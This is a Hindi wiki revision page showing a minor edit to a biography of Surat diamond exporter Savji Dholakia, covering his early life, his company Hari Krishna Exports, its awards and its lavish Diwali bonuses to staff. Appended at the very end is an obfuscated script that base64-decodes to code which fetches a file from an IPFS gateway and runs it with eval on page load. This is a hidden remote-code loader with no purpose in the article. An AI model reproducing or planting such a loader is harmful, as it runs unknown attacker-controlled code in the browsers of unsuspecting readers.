"सावजी ढोलकिया" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
 
पंक्ति 40: पंक्ति 40:
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन={{अद्यतन|14:58, 4 फ़रवरी 2022 (IST)}}
 
|अद्यतन={{अद्यतन|14:58, 4 फ़रवरी 2022 (IST)}}
}}'''सावजी धनजी ढोलकिया''' ([[अंग्रेज़ी]]: ''Savji Dhanji Dholakia'', जन्म- [[12 अप्रॅल]], [[1962]]) [[सूरत]] की हरि कृष्णा निर्यात प्राइवेट लिमिटेड कंपनी के संस्थापक और अध्यक्ष हैं। यह कंपनी [[भारत]] में डायमंड के निर्माण और निर्यात का कार्य करती हैं। इस कंपनी का [[मुंबई]], [[महाराष्ट्र]] में सेल्स कार्यालय हैं। सावजी ढोलकिया [[हीरा]] क्षेत्र में 'श्री सावजी काका' के रूप में जाने जाते हैं। उनकी कंपनी वर्तमान में मुंबई से 50 से अधिक देशों में तैयार हीरे निर्यात करती है। कंपनी के पास [[अमेरिका]], बेल्जियम, [[संयुक्त अरब अमिरात]], हांगकांग और [[चीन]] में सहयोगी भी है।<ref name="pp">{{cite web |url= https://www.dilsedeshi.com/biography/savji-dholakia-biography-hindi/|title=व्यापारी सावजी ढोलकिया की जीवनी|accessmonthday=04 फरवरी|accessyear=2022 |last= |first= |authorlink= |format= |publisher=dilsedeshi.com |language=हिंदी}}</ref> हाल ही में इन्हें [[पद्म श्री]] ([[2022]]) से सम्मानित किया गया है।
+
}}'''सावजी धनजी ढोलकिया''' ([[अंग्रेज़ी]]: ''Savji Dhanji Dholakia'', जन्म- [[12 अप्रॅल]], [[1962]]) [[सूरत]] की हरि कृष्णा निर्यात प्राइवेट लिमिटेड कंपनी के संस्थापक और अध्यक्ष हैं। यह कंपनी [[भारत]] में डायमंड के निर्माण और निर्यात का कार्य करती हैं। इस कंपनी का [[मुंबई]], [[महाराष्ट्र]] में सेल्स कार्यालय हैं। सावजी ढोलकिया [[हीरा]] क्षेत्र में 'श्री सावजी काका' के रूप में जाने जाते हैं। उनकी कंपनी वर्तमान में मुंबई से 50 से अधिक देशों में तैयार हीरे निर्यात करती है। कंपनी के पास [[अमेरिका]], बेल्जियम, संयुक्त अरब अमीरात, हांगकांग और [[चीन]] में सहयोगी भी है।<ref name="pp">{{cite web |url= https://www.dilsedeshi.com/biography/savji-dholakia-biography-hindi/|title=व्यापारी सावजी ढोलकिया की जीवनी|accessmonthday=04 फरवरी|accessyear=2022 |last= |first= |authorlink= |format= |publisher=dilsedeshi.com |language=हिंदी}}</ref> हाल ही में इन्हें [[पद्म श्री]] ([[2022]]) से सम्मानित किया गया है।
 
==प्रारम्भिक जीवन==
 
==प्रारम्भिक जीवन==
 
सावजी ढोलकिया का जन्म 12 अप्रैल, 1962 के दिन [[गुजरात]] के अमरेली में एक किसान [[परिवार]] में हुआ था। सावजी ढोलकिया ने सिर्फ 13 वर्ष में स्कूल छोड़कर सूरत में अपने चाचा के हीरे के कारोबार में काम करना शुरू कर दिया। अपनी पहली नौकरी महज 179 रुपये प्रतिमाह पर की थी। इसके दस साल बाद करीब [[1984]] में अपना हीरा व्यवसाय शुरू कर दिया। वर्ष [[1992]] में सावजी ढोलकिया के छोटे भाई घनश्याम भी इन्हीं के साथ कार्य करने लगे। सावजी ढोलकिया की पत्नी का नाम गौरीबेन एस. ढोलकिया है जिनसे उनकी दो बेटियां- मैना सिमेदिया, निमिषा ढोलकिया और एक बेटा द्रव्य ढोलकिया हैं।
 
सावजी ढोलकिया का जन्म 12 अप्रैल, 1962 के दिन [[गुजरात]] के अमरेली में एक किसान [[परिवार]] में हुआ था। सावजी ढोलकिया ने सिर्फ 13 वर्ष में स्कूल छोड़कर सूरत में अपने चाचा के हीरे के कारोबार में काम करना शुरू कर दिया। अपनी पहली नौकरी महज 179 रुपये प्रतिमाह पर की थी। इसके दस साल बाद करीब [[1984]] में अपना हीरा व्यवसाय शुरू कर दिया। वर्ष [[1992]] में सावजी ढोलकिया के छोटे भाई घनश्याम भी इन्हीं के साथ कार्य करने लगे। सावजी ढोलकिया की पत्नी का नाम गौरीबेन एस. ढोलकिया है जिनसे उनकी दो बेटियां- मैना सिमेदिया, निमिषा ढोलकिया और एक बेटा द्रव्य ढोलकिया हैं।

09:32, 4 फ़रवरी 2022 के समय का अवतरण

सावजी ढोलकिया
सावजी ढोलकिया
पूरा नाम सावजी धनजी ढोलकिया
जन्म 12 अप्रॅल, 1962
जन्म भूमि अमरेली, गुजरात
पति/पत्नी गौरीबेन एस. ढोलकिया
संतान पुत्र- द्रव्य ढोलकिया

पुत्री- मैना सिमेदिया, निमिषा ढोलकिया

कर्म भूमि भारत
पुरस्कार-उपाधि पद्म श्री (2022)

जेम एंड ज्वैलरी एक्सपोर्ट प्रमोशन काउंसिल पुरस्कार

प्रसिद्धि उद्योगपति
नागरिकता भारतीय
अन्य जानकारी सावजी ढोलकिया हर वर्ष कंपनी के कर्मचारियों को दिवाली के समय बोनस के रूप में 50 करोड़ से अधिक की वस्तुएं, जैसे- घर, आभूषण और कार देते हैं। वर्ष 2014 में दिवाली के समय बोनस के रूप में 491 कारें, 525 हीरे के आभूषण और 200 फ्लैट दिए थे।
अद्यतन‎

सावजी धनजी ढोलकिया (अंग्रेज़ी: Savji Dhanji Dholakia, जन्म- 12 अप्रॅल, 1962) सूरत की हरि कृष्णा निर्यात प्राइवेट लिमिटेड कंपनी के संस्थापक और अध्यक्ष हैं। यह कंपनी भारत में डायमंड के निर्माण और निर्यात का कार्य करती हैं। इस कंपनी का मुंबई, महाराष्ट्र में सेल्स कार्यालय हैं। सावजी ढोलकिया हीरा क्षेत्र में 'श्री सावजी काका' के रूप में जाने जाते हैं। उनकी कंपनी वर्तमान में मुंबई से 50 से अधिक देशों में तैयार हीरे निर्यात करती है। कंपनी के पास अमेरिका, बेल्जियम, संयुक्त अरब अमीरात, हांगकांग और चीन में सहयोगी भी है।[1] हाल ही में इन्हें पद्म श्री (2022) से सम्मानित किया गया है।

प्रारम्भिक जीवन

सावजी ढोलकिया का जन्म 12 अप्रैल, 1962 के दिन गुजरात के अमरेली में एक किसान परिवार में हुआ था। सावजी ढोलकिया ने सिर्फ 13 वर्ष में स्कूल छोड़कर सूरत में अपने चाचा के हीरे के कारोबार में काम करना शुरू कर दिया। अपनी पहली नौकरी महज 179 रुपये प्रतिमाह पर की थी। इसके दस साल बाद करीब 1984 में अपना हीरा व्यवसाय शुरू कर दिया। वर्ष 1992 में सावजी ढोलकिया के छोटे भाई घनश्याम भी इन्हीं के साथ कार्य करने लगे। सावजी ढोलकिया की पत्नी का नाम गौरीबेन एस. ढोलकिया है जिनसे उनकी दो बेटियां- मैना सिमेदिया, निमिषा ढोलकिया और एक बेटा द्रव्य ढोलकिया हैं।

कंपनी का गठन

वर्ष 1992 में सावजी ढोलकिया ने हरि कृष्णा प्राइवेट लिमिटेड नाम की निर्यात कंपनी का गठन किया। वर्ष 2014 में इस कंपनी का टर्न ओवर 4000 करोड़ रुपये था और कंपनी ने पिछले वर्ष की तुलना में कारोबार में 104% की वृद्धि की थी। इस कंपनी में कुल 6000 से अधिक कर्मचारी हैं। साथ ही यह कंपनी हीरे के आभूषण बनाने और निर्यात का भी कार्य करती है। किसना डायमंड ज्वेलरी भारत का बहुत बड़ा ब्रांड है जिसके 6500 से अधिक खुदरा दुकानों में और 480 से अधिक वितरकों के द्वारा वितरण का कार्य किया जाता है। इस ब्रांड को सावजी भाई की कंपनी ही हीरे उपलब्ध कराती है।[1]

उपलब्धियां

सावजी ढोलकिया की कंपनी इस उद्योग में भारत की शीर्ष 5 कंपनियों में से एक है। कंपनी ने अपने उत्कृष्ट प्रदर्शन के लिए कई प्रतिष्ठित पुरस्कार प्राप्त किए हैं। इस कंपनी को वर्ष 2003 से 2014 तक जेम एंड ज्वैलरी एक्सपोर्ट प्रमोशन काउंसिल पुरस्कार मिला है। वर्ष 2010-2011 में कंपनी को जीजेईपीसी का वार्षिक निर्यात पुरस्कार नरेन्द्र मोदी द्वारा प्रदान किया गया था।

कर्मचारियों का दिवाली बोनस

सावजी ढोलकिया हर वर्ष कंपनी के कर्मचारियों को दिवाली के समय बोनस के रूप में 50 करोड़ से अधिक की वस्तुएं, जैसे- घर, आभूषण और कार देते हैं। वर्ष 2014 में दिवाली के समय बोनस के रूप में 491 कारें, 525 हीरे के आभूषण और 200 फ्लैट दिए थे। वे अपने कर्मचारियों को वार्षिक लक्ष्य पूरा करने पर भी इसी तरह के तोहफों से सम्मानित करते हैं। वर्ष 2015 में चयनित 1,268 कर्मचारियों को मूल्यवान उपहार दिया था। 2016 में इनकी कंपनी ने 400 फ्लैट्स और 1260 कारों को अपने कर्मचारियों को उपहार दिया था। इसी तरह वर्ष 2018 में कंपनी में 25 साल पूरे करने वाले वरिष्ठ तीन कर्मचारियों को 3 करोड़ रुपये के तीन मर्सिडीज-बेंज जीएलएस एसयूवी पुरस्कार के रूप में दी गयी। वर्ष 2018 में भी कंपनी ने दिवाली के बोनस के रूप में 600 कारे अपने कर्मचारियों को दी थी।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 व्यापारी सावजी ढोलकिया की जीवनी (हिंदी) dilsedeshi.com। अभिगमन तिथि: 04 फरवरी, 2022।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>